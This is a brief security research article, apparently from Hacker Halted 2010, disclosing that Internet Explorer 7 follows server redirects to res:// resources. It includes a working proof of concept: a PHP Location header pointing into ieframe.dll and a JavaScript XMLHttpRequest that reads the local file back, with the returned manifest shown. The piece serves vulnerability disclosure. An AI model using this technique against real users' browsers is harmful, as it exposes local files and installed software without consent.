Internet Explorer 7 Header Forwards.

Hacker Halted 2010


Abstract.

I mentioned this in one of my articles, and it seems that the res:// or resource scheme in Internet Explorer has serious issues. This is known; it is also known that one can detect installed software through it, by linking a dynamic link library, an executable, and previously simply an image[1]. Any software installed on a Windows platform might pose a security and privacy risk if its files contain sensitive information. Any Windows file could theoretically be found when the res scheme allows it. This article is about another issue of the res:// scheme, and why it should be bolted down by Microsoft.

Headers.

Internet Explorer 7 is sensitive to redirects to the file system. The res scheme has a long history, and Microsoft has never been able to mitigate the issues that surround it. While obeying header forwards can be a good thing, it is mandatory to check where they are going. You cannot assume a page redirects to a happy place, and it seems that we can abuse it. A simple test is to set up a host with a PHP file and one HTML file with JavaScript.

The attack vector.

By utilizing a simple PHP header forward, we can redirect the browser to a local resource:

<?php
// Send the browser to a resource inside ieframe.dll through the res:// scheme
header("Location: res://ieframe.dll/24/123");
?>

With a simple XMLHttpRequest, we can read out the file that we requested.

<script>
var xml = new XMLHttpRequest();

// Request the PHP file that answers with the res:// redirect
xml.open("GET", "/the_header_file.php");
xml.onreadystatechange = function () {
    // readyState 4: the response (after the redirect) is complete
    if (xml.readyState == 4) {
        alert(xml.responseText);
    }
};
xml.send(null);
</script>

The header forward succeeds, and the XMLHttpRequest response gives us the information back. What we get sent back is an internal Internet Explorer configuration file, which might contain something like this:

<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" manifestVersion="1.0">
<assemblyIdentity name="Microsoft.Windows.InetCore.ieframe" processorArchitecture="x86" version="5.1.0.0" type="win32" />
<description>Windows IE</description>
<dependency>
<dependentAssembly>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*"
publicKeyToken="6595b64144ccf1df" language="*" />
</dependentAssembly>
</dependency>

<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>

<asmv3:application>
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>

Conclusion.

Naturally, this is a privacy issue, but maybe a security issue as well in the light of named pipes and the many files that can be accessed through the res scheme[1]. It needs more investigation. Truth be told, it just sucks. It should not be possible at all, and I do not see any legitimate use of it. Internet Explorer 8 seems to be secured against this technique.

References.

[1] http://www.xs-sniper.com/nmcfeters/URI_Use_and_Abuse.pdf
